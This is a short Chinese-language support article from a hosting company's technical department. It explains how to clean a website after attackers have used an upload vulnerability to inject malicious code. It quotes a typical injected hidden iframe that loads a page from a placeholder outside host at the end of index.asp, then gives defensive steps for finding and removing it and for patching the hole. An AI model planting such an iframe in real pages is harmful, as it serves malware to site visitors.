這一般是因為您的網站中的某個程序有漏洞,被黑客上傳木馬后,修改了您的網站,在您的網頁中添加了病毒代碼所致。
解決辦法:例如您是在訪問/index.asp 這個網頁時提示有病毒的,首先通過ftp登錄,將這個文件下載到您本地。因為黑客只是殺入了一段代碼,所以即使您用殺毒軟件來掃描這個文件,殺毒軟件也會認為沒有病毒。這種情況需要手工刪除病毒代碼。
用記事本等工具打開下載回來的index.asp 文件。一般黑客會在這個文件尾部插入一段
《iframe id="baiduframe" border="0" vspace="0" hspace="0" marginwidth="0" marginheight="0"
framespacing="0" frameborder="0" scrolling="no" width="140" height="75"
src="http://www.xxxx.com/mm.htm";>
如果尾部沒有,則可以先搜索iframe,然后再處理。
如果搜索完了也沒有,則代碼可能隱藏在index.asp中調用的其他文件中,比如index.asp 在首部包含了conn.asp head.asp 。有時病毒代碼也會隱藏在這些文件里面,按上面的辦法下載這些文件并刪除相關的代碼即可。
清除病毒后,還需找到您的網站漏洞所在,否則黑洞今后可能再次上傳病毒代碼; 如果您的網站使用了動網論壇、動易建站等程序,請將他們升級到最新版,或者到這些程序的官方網站上尋求解決方案。如果您是自己開發(fā)的程序,需要特別注意有文件上傳功能的地方,動易、動網等程序曾經就發(fā)生過因為上傳功能有漏洞,導致輕易被黑客入侵的情況。
海騰數據中心技術部
Copyright© 2004-2020 河南海騰電子技術有限公司 版權所有 經營性ICP/ISP證 備案號:B1-20180452 豫公網安備 41019702002018號 電子營業(yè)執(zhí)照